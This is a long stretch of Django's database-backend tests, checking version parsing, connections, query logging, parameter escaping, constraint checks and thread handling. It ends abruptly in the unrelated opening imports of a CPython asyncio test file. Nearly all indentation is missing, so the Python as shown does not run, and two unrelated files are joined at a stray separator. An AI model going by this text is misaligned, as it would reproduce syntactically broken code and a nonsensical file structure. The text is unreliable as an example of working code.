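                # cache=shared lets several connections share that one DB.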
}
}
wrapper = DatabaseWrapper(settings_dict)
creation = wrapper.creation
if creation.connection.features.can_share_in_memory_db:
expected = creation.connection.settings_dict['TEST']['NAME']
self.assertEqual(creation._get_test_db_name(), expected)
else:
msg = (
"Using a shared memory database with `mode=memory` in the "
"database name is not supported in your environment, "
"use `:memory:` instead."
)
with self.assertRaisesMessage(ImproperlyConfigured, msg):
creation._get_test_db_name()
@unittest.skipUnless(connection.vendor == 'postgresql', "Test only for PostgreSQL")
class PostgreSQLTests(TestCase):
def assert_parses(self, version_string, version):
self.assertEqual(pg_version._parse_version(version_string), version)
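    # Django encodes PostgreSQL versions as major * 10000 + minor * 100 + micro,
    # so '9.3.6' -> 90306 and a bare '9.3' or '9.3 beta4' -> 90300.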
def test_parsing(self):
"""Test PostgreSQL version parsing from `SELECT version()` output"""
self.assert_parses("PostgreSQL 9.3 beta4", 90300)
self.assert_parses("PostgreSQL 9.3", 90300)
self.assert_parses("EnterpriseDB 9.3", 90300)
self.assert_parses("PostgreSQL 9.3.6", 90306)
self.assert_parses("PostgreSQL 9.4beta1", 90400)
self.assert_parses(
"PostgreSQL 9.3.1 on i386-apple-darwin9.2.2, compiled by GCC "
"i686-apple-darwin9-gcc-4.0.1 (GCC) 4.0.1 (Apple Inc. build 5478)",
90301
)
def test_nodb_connection(self):
"""
        The _nodb_connection property falls back to the default connection's
        database when access to the 'postgres' database is not granted.
"""
def mocked_connect(self):
if self.settings_dict['NAME'] is None:
raise DatabaseError()
return ''
nodb_conn = connection._nodb_connection
self.assertIsNone(nodb_conn.settings_dict['NAME'])
# Now assume the 'postgres' db isn't available
with warnings.catch_warnings(record=True) as w:
with mock.patch('django.db.backends.base.base.BaseDatabaseWrapper.connect',
side_effect=mocked_connect, autospec=True):
warnings.simplefilter('always', RuntimeWarning)
nodb_conn = connection._nodb_connection
self.assertIsNotNone(nodb_conn.settings_dict['NAME'])
self.assertEqual(nodb_conn.settings_dict['NAME'], connection.settings_dict['NAME'])
# Check a RuntimeWarning has been emitted
self.assertEqual(len(w), 1)
self.assertEqual(w[0].message.__class__, RuntimeWarning)
def test_version_detection(self):
"""Test PostgreSQL version detection"""
# Helper mocks
class CursorMock(object):
"Very simple mock of DB-API cursor"
def execute(self, arg):
pass
def fetchone(self):
return ["PostgreSQL 9.3"]
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
pass
class OlderConnectionMock(object):
"Mock of psycopg2 (< 2.0.12) connection"
def cursor(self):
return CursorMock()
# psycopg2 < 2.0.12 code path
conn = OlderConnectionMock()
self.assertEqual(pg_version.get_version(conn), 90300)
def test_connect_and_rollback(self):
"""
PostgreSQL shouldn't roll back SET TIME ZONE, even if the first
transaction is rolled back (#17062).
"""
new_connection = connection.copy()
try:
# Ensure the database default time zone is different than
# the time zone in new_connection.settings_dict. We can
# get the default time zone by reset & show.
cursor = new_connection.cursor()
cursor.execute("RESET TIMEZONE")
cursor.execute("SHOW TIMEZONE")
db_default_tz = cursor.fetchone()[0]
new_tz = 'Europe/Paris' if db_default_tz == 'UTC' else 'UTC'
new_connection.close()
# Invalidate timezone name cache, because the setting_changed
# handler cannot know about new_connection.
del new_connection.timezone_name
# Fetch a new connection with the new_tz as default
# time zone, run a query and rollback.
with self.settings(TIME_ZONE=new_tz):
new_connection.set_autocommit(False)
cursor = new_connection.cursor()
new_connection.rollback()
# Now let's see if the rollback rolled back the SET TIME ZONE.
cursor.execute("SHOW TIMEZONE")
tz = cursor.fetchone()[0]
self.assertEqual(new_tz, tz)
finally:
new_connection.close()
def test_connect_non_autocommit(self):
"""
The connection wrapper shouldn't believe that autocommit is enabled
after setting the time zone when AUTOCOMMIT is False (#21452).
"""
new_connection = connection.copy()
new_connection.settings_dict['AUTOCOMMIT'] = False
try:
# Open a database connection.
new_connection.cursor()
self.assertFalse(new_connection.get_autocommit())
finally:
new_connection.close()
def test_connect_isolation_level(self):
"""
Regression test for #18130 and #24318.
"""
import psycopg2
from psycopg2.extensions import (
ISOLATION_LEVEL_READ_COMMITTED as read_committed,
ISOLATION_LEVEL_SERIALIZABLE as serializable,
)
# Since this is a django.test.TestCase, a transaction is in progress
# and the isolation level isn't reported as 0. This test assumes that
# PostgreSQL is configured with the default isolation level.
# Check the level on the psycopg2 connection, not the Django wrapper.
default_level = read_committed if psycopg2.__version__ < '2.7' else None
self.assertEqual(connection.connection.isolation_level, default_level)
new_connection = connection.copy()
new_connection.settings_dict['OPTIONS']['isolation_level'] = serializable
try:
# Start a transaction so the isolation level isn't reported as 0.
new_connection.set_autocommit(False)
# Check the level on the psycopg2 connection, not the Django wrapper.
self.assertEqual(new_connection.connection.isolation_level, serializable)
finally:
new_connection.close()
def _select(self, val):
with connection.cursor() as cursor:
cursor.execute("SELECT %s", (val,))
return cursor.fetchone()[0]
def test_select_ascii_array(self):
a = ["awef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_select_unicode_array(self):
a = ["ᄲawef"]
b = self._select(a)
self.assertEqual(a[0], b[0])
def test_lookup_cast(self):
from django.db.backends.postgresql.operations import DatabaseOperations
do = DatabaseOperations(connection=None)
for lookup in ('iexact', 'contains', 'icontains', 'startswith',
'istartswith', 'endswith', 'iendswith', 'regex', 'iregex'):
self.assertIn('::text', do.lookup_cast(lookup))
def test_correct_extraction_psycopg2_version(self):
from django.db.backends.postgresql.base import psycopg2_version
version_path = 'django.db.backends.postgresql.base.Database.__version__'
with mock.patch(version_path, '2.6.9'):
self.assertEqual(psycopg2_version(), (2, 6, 9))
with mock.patch(version_path, '2.5.dev0'):
self.assertEqual(psycopg2_version(), (2, 5))
class DateQuotingTest(TestCase):
def test_django_date_trunc(self):
"""
        Test the custom ``django_date_trunc`` method, in particular against
fields which clash with strings passed to it (e.g. 'year') (#12818).
"""
updated = datetime.datetime(2010, 2, 20)
SchoolClass.objects.create(year=2009, last_updated=updated)
years = SchoolClass.objects.dates('last_updated', 'year')
self.assertEqual(list(years), [datetime.date(2010, 1, 1)])
def test_django_date_extract(self):
"""
        Test the custom ``django_date_extract`` method, in particular against fields
which clash with strings passed to it (e.g. 'day') (#12818).
"""
updated = datetime.datetime(2010, 2, 20)
SchoolClass.objects.create(year=2009, last_updated=updated)
classes = SchoolClass.objects.filter(last_updated__day=20)
self.assertEqual(len(classes), 1)
@override_settings(DEBUG=True)
class LastExecutedQueryTest(TestCase):
def test_last_executed_query(self):
"""
last_executed_query should not raise an exception even if no previous
query has been run.
"""
cursor = connection.cursor()
connection.ops.last_executed_query(cursor, '', ())
def test_debug_sql(self):
list(Reporter.objects.filter(first_name="test"))
sql = connection.queries[-1]['sql'].lower()
self.assertIn("select", sql)
self.assertIn(Reporter._meta.db_table, sql)
def test_query_encoding(self):
"""
        last_executed_query() returns a Unicode string
"""
data = RawData.objects.filter(raw_data=b'\x00\x46 \xFE').extra(select={'föö': 1})
sql, params = data.query.sql_with_params()
cursor = data.query.get_compiler('default').execute_sql(CURSOR)
last_sql = cursor.db.ops.last_executed_query(cursor, sql, params)
self.assertIsInstance(last_sql, six.text_type)
@unittest.skipUnless(connection.vendor == 'sqlite',
"This test is specific to SQLite.")
def test_no_interpolation_on_sqlite(self):
        # This shouldn't raise an exception (#17158)
query = "SELECT strftime('%Y', 'now');"
connection.cursor().execute(query)
self.assertEqual(connection.queries[-1]['sql'], query)
@unittest.skipUnless(connection.vendor == 'sqlite',
"This test is specific to SQLite.")
def test_parameter_quoting_on_sqlite(self):
        # The implementation of last_executed_query() isn't optimal. It's
        # worth testing that parameters are quoted; see #14091.
query = "SELECT %s"
params = ["\"'\\"]
connection.cursor().execute(query, params)
# Note that the single quote is repeated
substituted = "SELECT '\"''\\'"
self.assertEqual(connection.queries[-1]['sql'], substituted)
@unittest.skipUnless(connection.vendor == 'sqlite',
"This test is specific to SQLite.")
def test_large_number_of_parameters_on_sqlite(self):
# If SQLITE_MAX_VARIABLE_NUMBER (default = 999) has been changed to be
# greater than SQLITE_MAX_COLUMN (default = 2000), last_executed_query
# can hit the SQLITE_MAX_COLUMN limit. See #26063.
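        # Django interpolates the parameters by running a helper query of the
        # form "SELECT QUOTE(?), QUOTE(?), ..." -- one result column per
        # parameter -- which is what can collide with SQLITE_MAX_COLUMN.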
cursor = connection.cursor()
sql = "SELECT MAX(%s)" % ", ".join(["%s"] * 2001)
params = list(range(2001))
# This should not raise an exception.
cursor.db.ops.last_executed_query(cursor.cursor, sql, params)
class ParameterHandlingTest(TestCase):
def test_bad_parameter_count(self):
"An executemany call with too many/not enough parameters will raise an exception (Refs #12612)"
cursor = connection.cursor()
query = ('INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (
connection.introspection.table_name_converter('backends_square'),
connection.ops.quote_name('root'),
connection.ops.quote_name('square')
))
with self.assertRaises(Exception):
cursor.executemany(query, [(1, 2, 3)])
with self.assertRaises(Exception):
cursor.executemany(query, [(1,)])
class LongNameTest(TransactionTestCase):
"""Long primary keys and model names can result in a sequence name
that exceeds the database limits, which will result in truncation
    on certain databases (e.g., Postgres). The backend needs to use
    the correct sequence name in last_insert_id and other places, so
    check that it does. Refs #8901.
"""
available_apps = ['backends']
def test_sequence_name_length_limits_create(self):
"""Test creation of model with long name and long pk name doesn't error. Ref #8901"""
VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
def test_sequence_name_length_limits_m2m(self):
"""
An m2m save of a model with a long name and a long m2m field name
doesn't error (#8901).
"""
obj = VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ.objects.create()
rel_obj = Person.objects.create(first_name='Django', last_name='Reinhardt')
obj.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.add(rel_obj)
def test_sequence_name_length_limits_flush(self):
"""
Sequence resetting as part of a flush with model with long name and
long pk name doesn't error (#8901).
"""
        # A full flush is expensive relative to the rest of this test, so we
        # dig into the internals to generate the likely offending SQL and run
        # it manually
# Some convenience aliases
VLM = VeryLongModelNameZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
VLM_m2m = VLM.m2m_also_quite_long_zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz.through
tables = [
VLM._meta.db_table,
VLM_m2m._meta.db_table,
]
sequences = [
{
'column': VLM._meta.pk.column,
'table': VLM._meta.db_table
},
]
cursor = connection.cursor()
for statement in connection.ops.sql_flush(no_style(), tables, sequences):
cursor.execute(statement)
class SequenceResetTest(TestCase):
def test_generic_relation(self):
"Sequence names are correct when resetting generic relations (Ref #13941)"
# Create an object with a manually specified PK
Post.objects.create(id=10, name='1st post', text='hello world')
# Reset the sequences for the database
cursor = connection.cursor()
commands = connections[DEFAULT_DB_ALIAS].ops.sequence_reset_sql(no_style(), [Post])
for sql in commands:
cursor.execute(sql)
# If we create a new object now, it should have a PK greater
# than the PK we specified manually.
obj = Post.objects.create(name='New post', text='goodbye world')
self.assertGreater(obj.pk, 10)
# This test needs to run outside of a transaction, otherwise closing the
# connection would implicitly rollback and cause problems during teardown.
class ConnectionCreatedSignalTest(TransactionTestCase):
available_apps = []
# Unfortunately with sqlite3 the in-memory test database cannot be closed,
# and so it cannot be re-opened during testing.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_signal(self):
data = {}
def receiver(sender, connection, **kwargs):
data["connection"] = connection
connection_created.connect(receiver)
connection.close()
connection.cursor()
self.assertIs(data["connection"].connection, connection.connection)
connection_created.disconnect(receiver)
data.clear()
connection.cursor()
self.assertEqual(data, {})
class EscapingChecks(TestCase):
"""
All tests in this test case are also run with settings.DEBUG=True in
EscapingChecksDebug test case, to also test CursorDebugWrapper.
"""
bare_select_suffix = connection.features.bare_select_suffix
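    # bare_select_suffix is whatever a bare SELECT needs on this backend to be
    # valid SQL: ' FROM DUAL' on Oracle, an empty string on most others.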
def test_paramless_no_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%s'" + self.bare_select_suffix)
self.assertEqual(cursor.fetchall()[0][0], '%s')
def test_parameter_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%%', %s" + self.bare_select_suffix, ('%d',))
self.assertEqual(cursor.fetchall()[0], ('%', '%d'))
@unittest.skipUnless(connection.vendor == 'sqlite',
"This is an sqlite-specific issue")
def test_sqlite_parameter_escaping(self):
# '%s' escaping support for sqlite3 #13648
cursor = connection.cursor()
cursor.execute("select strftime('%s', date('now'))")
response = cursor.fetchall()[0][0]
        # response should be a non-zero integer
self.assertTrue(int(response))
@override_settings(DEBUG=True)
class EscapingChecksDebug(EscapingChecks):
pass
class BackendTestCase(TransactionTestCase):
available_apps = ['backends']
def create_squares_with_executemany(self, args):
self.create_squares(args, 'format', True)
def create_squares(self, args, paramstyle, multiple):
cursor = connection.cursor()
opts = Square._meta
tbl = connection.introspection.table_name_converter(opts.db_table)
f1 = connection.ops.quote_name(opts.get_field('root').column)
f2 = connection.ops.quote_name(opts.get_field('square').column)
if paramstyle == 'format':
query = 'INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (tbl, f1, f2)
elif paramstyle == 'pyformat':
query = 'INSERT INTO %s (%s, %s) VALUES (%%(root)s, %%(square)s)' % (tbl, f1, f2)
else:
raise ValueError("unsupported paramstyle in test")
if multiple:
cursor.executemany(query, args)
else:
cursor.execute(query, args)
def test_cursor_executemany(self):
# Test cursor.executemany #4896
args = [(i, i ** 2) for i in range(-5, 6)]
self.create_squares_with_executemany(args)
self.assertEqual(Square.objects.count(), 11)
for i in range(-5, 6):
square = Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
def test_cursor_executemany_with_empty_params_list(self):
# Test executemany with params=[] does nothing #4765
args = []
self.create_squares_with_executemany(args)
self.assertEqual(Square.objects.count(), 0)
def test_cursor_executemany_with_iterator(self):
# Test executemany accepts iterators #10320
args = iter((i, i ** 2) for i in range(-3, 2))
self.create_squares_with_executemany(args)
self.assertEqual(Square.objects.count(), 5)
args = iter((i, i ** 2) for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares_with_executemany(args)
self.assertEqual(Square.objects.count(), 9)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_execute_with_pyformat(self):
# Support pyformat style passing of parameters #10070
args = {'root': 3, 'square': 9}
self.create_squares(args, 'pyformat', multiple=False)
self.assertEqual(Square.objects.count(), 1)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat(self):
# Support pyformat style passing of parameters #10070
args = [{'root': i, 'square': i ** 2} for i in range(-5, 6)]
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(Square.objects.count(), 11)
for i in range(-5, 6):
square = Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat_iterator(self):
args = iter({'root': i, 'square': i ** 2} for i in range(-3, 2))
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(Square.objects.count(), 5)
args = iter({'root': i, 'square': i ** 2} for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(Square.objects.count(), 9)
def test_unicode_fetches(self):
# fetchone, fetchmany, fetchall return strings as unicode objects #6254
qn = connection.ops.quote_name
Person(first_name="John", last_name="Doe").save()
Person(first_name="Jane", last_name="Doe").save()
Person(first_name="Mary", last_name="Agnelline").save()
Person(first_name="Peter", last_name="Parker").save()
Person(first_name="Clark", last_name="Kent").save()
opts2 = Person._meta
f3, f4 = opts2.get_field('first_name'), opts2.get_field('last_name')
cursor = connection.cursor()
cursor.execute(
'SELECT %s, %s FROM %s ORDER BY %s' % (
qn(f3.column),
qn(f4.column),
connection.introspection.table_name_converter(opts2.db_table),
qn(f3.column),
)
)
self.assertEqual(cursor.fetchone(), ('Clark', 'Kent'))
self.assertEqual(list(cursor.fetchmany(2)), [('Jane', 'Doe'), ('John', 'Doe')])
self.assertEqual(list(cursor.fetchall()), [('Mary', 'Agnelline'), ('Peter', 'Parker')])
def test_unicode_password(self):
old_password = connection.settings_dict['PASSWORD']
connection.settings_dict['PASSWORD'] = "françois"
try:
connection.cursor()
except DatabaseError:
# As password is probably wrong, a database exception is expected
pass
except Exception as e:
self.fail("Unexpected error raised with unicode password: %s" % e)
finally:
connection.settings_dict['PASSWORD'] = old_password
def test_database_operations_helper_class(self):
# Ticket #13630
self.assertTrue(hasattr(connection, 'ops'))
self.assertTrue(hasattr(connection.ops, 'connection'))
self.assertEqual(connection, connection.ops.connection)
def test_database_operations_init(self):
"""
DatabaseOperations initialization doesn't query the database.
See #17656.
"""
with self.assertNumQueries(0):
connection.ops.__class__(connection)
def test_cached_db_features(self):
self.assertIn(connection.features.supports_transactions, (True, False))
self.assertIn(connection.features.supports_stddev, (True, False))
self.assertIn(connection.features.can_introspect_foreign_keys, (True, False))
def test_duplicate_table_error(self):
""" Creating an existing table returns a DatabaseError """
cursor = connection.cursor()
query = 'CREATE TABLE %s (id INTEGER);' % Article._meta.db_table
with self.assertRaises(DatabaseError):
cursor.execute(query)
def test_cursor_contextmanager(self):
"""
        Cursors can be used as context managers
"""
with connection.cursor() as cursor:
self.assertIsInstance(cursor, CursorWrapper)
        # Both InterfaceError and ProgrammingError seem to be used when
        # accessing a closed cursor (psycopg2 raises InterfaceError, the
        # rest seem to use ProgrammingError).
with self.assertRaises(connection.features.closed_cursor_error_class):
# cursor should be closed, so no queries should be possible.
cursor.execute("SELECT 1" + connection.features.bare_select_suffix)
@unittest.skipUnless(connection.vendor == 'postgresql',
"Psycopg2 specific cursor.closed attribute needed")
def test_cursor_contextmanager_closing(self):
        # There isn't a generic way to test that cursors are closed, but
        # psycopg2 exposes a cursor.closed attribute, so run this check
        # only on psycopg2.
with connection.cursor() as cursor:
self.assertIsInstance(cursor, CursorWrapper)
self.assertTrue(cursor.closed)
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_is_usable_after_database_disconnects(self):
"""
is_usable() doesn't crash when the database disconnects (#21553).
"""
# Open a connection to the database.
with connection.cursor():
pass
# Emulate a connection close by the database.
connection._close()
# Even then is_usable() should not raise an exception.
try:
self.assertFalse(connection.is_usable())
finally:
# Clean up the mess created by connection._close(). Since the
# connection is already closed, this crashes on some backends.
try:
connection.close()
except Exception:
pass
@override_settings(DEBUG=True)
def test_queries(self):
"""
Test the documented API of connection.queries.
"""
with connection.cursor() as cursor:
reset_queries()
cursor.execute("SELECT 1" + connection.features.bare_select_suffix)
self.assertEqual(1, len(connection.queries))
self.assertIsInstance(connection.queries, list)
self.assertIsInstance(connection.queries[0], dict)
self.assertCountEqual(connection.queries[0].keys(), ['sql', 'time'])
reset_queries()
self.assertEqual(0, len(connection.queries))
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
@override_settings(DEBUG=True)
def test_queries_limit(self):
"""
The backend doesn't store an unlimited number of queries (#12581).
"""
old_queries_limit = BaseDatabaseWrapper.queries_limit
BaseDatabaseWrapper.queries_limit = 3
new_connection = connection.copy()
# Initialize the connection and clear initialization statements.
with new_connection.cursor():
pass
new_connection.queries_log.clear()
try:
with new_connection.cursor() as cursor:
cursor.execute("SELECT 1" + new_connection.features.bare_select_suffix)
cursor.execute("SELECT 2" + new_connection.features.bare_select_suffix)
with warnings.catch_warnings(record=True) as w:
self.assertEqual(2, len(new_connection.queries))
self.assertEqual(0, len(w))
with new_connection.cursor() as cursor:
cursor.execute("SELECT 3" + new_connection.features.bare_select_suffix)
cursor.execute("SELECT 4" + new_connection.features.bare_select_suffix)
with warnings.catch_warnings(record=True) as w:
self.assertEqual(3, len(new_connection.queries))
self.assertEqual(1, len(w))
self.assertEqual(
str(w[0].message),
"Limit for query logging exceeded, only the last 3 queries will be returned."
)
finally:
BaseDatabaseWrapper.queries_limit = old_queries_limit
new_connection.close()
def test_timezone_none_use_tz_false(self):
connection.ensure_connection()
with self.settings(TIME_ZONE=None, USE_TZ=False):
connection.init_connection_state()
# We don't make these tests conditional because that would mean we need to
# check and differentiate between:
# * MySQL+InnoDB and MySQL+MyISAM (something we currently can't do), and
# * whether sqlite3 (if/once we get #14204 fixed) has referential integrity
#   turned on or not, something that would be controlled by runtime support
#   and user preference,
# and then verify that the raised exception is django.db.IntegrityError.
class FkConstraintsTests(TransactionTestCase):
available_apps = ['backends']
def setUp(self):
# Create a Reporter.
self.r = Reporter.objects.create(first_name='John', last_name='Smith')
def test_integrity_checks_on_creation(self):
"""
        Try to create a model instance that violates a FK constraint. If it
        fails, it should fail with IntegrityError.
"""
a1 = Article(headline="This is a test", pub_date=datetime.datetime(2005, 7, 27), reporter_id=30)
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
        # Now that we know this backend supports integrity checks, make sure
        # constraints are also enforced for proxy models. Refs #17519.
a2 = Article(
headline='This is another test', reporter=self.r,
pub_date=datetime.datetime(2012, 8, 3),
reporter_proxy_id=30,
)
with self.assertRaises(IntegrityError):
a2.save()
def test_integrity_checks_on_update(self):
"""
Try to update a model instance introducing a FK constraint violation.
        If it fails, it should fail with IntegrityError.
"""
# Create an Article.
Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a1 = Article.objects.get(headline="Test article")
a1.reporter_id = 30
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
        # Now that we know this backend supports integrity checks, make sure
        # constraints are also enforced for proxy models. Refs #17519.
# Create another article
r_proxy = ReporterProxy.objects.get(pk=self.r.pk)
Article.objects.create(
headline='Another article',
pub_date=datetime.datetime(1988, 5, 15),
reporter=self.r, reporter_proxy=r_proxy,
)
# Retrieve the second article from the DB
a2 = Article.objects.get(headline='Another article')
a2.reporter_proxy_id = 30
with self.assertRaises(IntegrityError):
a2.save()
def test_disable_constraint_checks_manually(self):
"""
        When constraint checks are disabled, it should be possible to write
        bad data without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
Article.objects.create(
headline="Test article",
pub_date=datetime.datetime(2010, 9, 4),
reporter=self.r,
)
# Retrieve it from the DB
a = Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
connection.disable_constraint_checking()
a.save()
connection.enable_constraint_checking()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_disable_constraint_checks_context_manager(self):
"""
        When constraint checks are disabled (using the context manager), it
        should be possible to write bad data without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
Article.objects.create(
headline="Test article",
pub_date=datetime.datetime(2010, 9, 4),
reporter=self.r,
)
# Retrieve it from the DB
a = Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
with connection.constraint_checks_disabled():
a.save()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_check_constraints(self):
"""
Constraint checks should raise an IntegrityError when bad data is in the DB.
"""
with transaction.atomic():
# Create an Article.
Article.objects.create(
headline="Test article",
pub_date=datetime.datetime(2010, 9, 4),
reporter=self.r,
)
# Retrieve it from the DB
a = Article.objects.get(headline="Test article")
a.reporter_id = 30
with connection.constraint_checks_disabled():
a.save()
with self.assertRaises(IntegrityError):
connection.check_constraints()
transaction.set_rollback(True)
class ThreadTests(TransactionTestCase):
available_apps = ['backends']
def test_default_connection_thread_local(self):
"""
The default connection (i.e. django.db.connection) is different for
each thread (#17258).
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
connection.cursor()
connections_dict[id(connection)] = connection
def runner():
# Passing django.db.connection between threads doesn't work while
# connections[DEFAULT_DB_ALIAS] does.
from django.db import connections
connection = connections[DEFAULT_DB_ALIAS]
# Allow thread sharing so the connection can be closed by the
# main thread.
connection.allow_thread_sharing = True
connection.cursor()
connections_dict[id(connection)] = connection
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
        # Each created connection got a different inner connection.
self.assertEqual(
len(set(conn.connection for conn in connections_dict.values())),
3)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_connections_thread_local(self):
"""
The connections are different for each thread (#17258).
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
for conn in connections.all():
connections_dict[id(conn)] = conn
def runner():
from django.db import connections
for conn in connections.all():
# Allow thread sharing so the connection can be closed by the
# main thread.
conn.allow_thread_sharing = True
connections_dict[id(conn)] = conn
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertEqual(len(connections_dict), 6)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_pass_connection_between_threads(self):
"""
A connection can be passed from one thread to the other (#17258).
"""
Person.objects.create(first_name="John", last_name="Doe")
def do_thread():
def runner(main_thread_connection):
from django.db import connections
connections['default'] = main_thread_connection
try:
Person.objects.get(first_name="John", last_name="Doe")
except Exception as e:
exceptions.append(e)
t = threading.Thread(target=runner, args=[connections['default']])
t.start()
t.join()
# Without touching allow_thread_sharing, which should be False by default.
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to False
connections['default'].allow_thread_sharing = False
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to True
connections['default'].allow_thread_sharing = True
exceptions = []
do_thread()
# All good
self.assertEqual(exceptions, [])
def test_closing_non_shared_connections(self):
"""
A connection that is not explicitly shareable cannot be closed by
another thread (#17258).
"""
# First, without explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# The exception was raised
self.assertEqual(len(exceptions), 1)
# Then, with explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
# Enable thread sharing
connections['default'].allow_thread_sharing = True
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# No exception was raised
self.assertEqual(len(exceptions), 0)
class MySQLPKZeroTests(TestCase):
"""
    Zero as id for AutoField should raise an exception in MySQL, because
    MySQL does not allow zero as an autoincrement primary key.
"""
@skipIfDBFeature('allows_auto_pk_0')
def test_zero_as_autoval(self):
with self.assertRaises(ValueError):
Square.objects.create(id=0, root=0, square=1)
class DBConstraintTestCase(TestCase):
def test_can_reference_existent(self):
obj = Object.objects.create()
ref = ObjectReference.objects.create(obj=obj)
self.assertEqual(ref.obj, obj)
ref = ObjectReference.objects.get(obj=obj)
self.assertEqual(ref.obj, obj)
def test_can_reference_non_existent(self):
self.assertFalse(Object.objects.filter(id=12345).exists())
ref = ObjectReference.objects.create(obj_id=12345)
ref_new = ObjectReference.objects.get(obj_id=12345)
self.assertEqual(ref, ref_new)
with self.assertRaises(Object.DoesNotExist):
ref.obj
def test_many_to_many(self):
obj = Object.objects.create()
obj.related_objects.create()
self.assertEqual(Object.objects.count(), 2)
self.assertEqual(obj.related_objects.count(), 1)
intermediary_model = Object._meta.get_field("related_objects").remote_field.through
intermediary_model.objects.create(from_object_id=obj.id, to_object_id=12345)
self.assertEqual(obj.related_objects.count(), 1)
self.assertEqual(intermediary_model.objects.count(), 2)
class BackendUtilTests(SimpleTestCase):
def test_format_number(self):
"""
Test the format_number converter utility
"""
def equal(value, max_d, places, result):
self.assertEqual(format_number(Decimal(value), max_d, places), result)
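        # Arguments: (value, max_digits, decimal_places, expected string).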
equal('0', 12, 3,
'0.000')
equal('0', 12, 8,
'0.00000000')
equal('1', 12, 9,
'1.000000000')
equal('0.00000000', 12, 8,
'0.00000000')
equal('0.000000004', 12, 8,
'0.00000000')
equal('0.000000008', 12, 8,
'0.00000001')
equal('0.000000000000000000999', 10, 8,
'0.00000000')
equal('0.1234567890', 12, 10,
'0.1234567890')
equal('0.1234567890', 12, 9,
'0.123456789')
equal('0.1234567890', 12, 8,
'0.12345679')
equal('0.1234567890', 12, 5,
'0.12346')
equal('0.1234567890', 12, 3,
'0.123')
equal('0.1234567890', 12, 1,
'0.1')
equal('0.1234567890', 12, 0,
'0')
equal('0.1234567890', None, 0,
'0')
equal('1234567890.1234567890', None, 0,
'1234567890')
equal('1234567890.1234567890', None, 2,
'1234567890.12')
equal('0.1234', 5, None,
'0.1234')
equal('123.12', 5, None,
'123.12')
with self.assertRaises(Rounded):
equal('0.1234567890', 5, None,
'0.12346')
with self.assertRaises(Rounded):
equal('1234567890.1234', 5, None,
'1234600000')
@unittest.skipUnless(connection.vendor == 'sqlite', 'SQLite specific test.')
@skipUnlessDBFeature('can_share_in_memory_db')
class TestSqliteThreadSharing(TransactionTestCase):
available_apps = ['backends']
def test_database_sharing_in_threads(self):
def create_object():
Object.objects.create()
create_object()
thread = threading.Thread(target=create_object)
thread.start()
thread.join()
self.assertEqual(Object.objects.count(), 2)
|
test_base_events.py
|
"""Tests for base_events.py"""
import concurrent.futures
import errno
import math
import socket
import sys
import threading
import time
import unittest
from unittest import mock
import asyncio
from asyncio import base_events
from asyncio import constants
from test.test_asyncio import utils as test_utils
from test import support
from test.support.script_helper import assert_python_ok
from test.support import os_helper
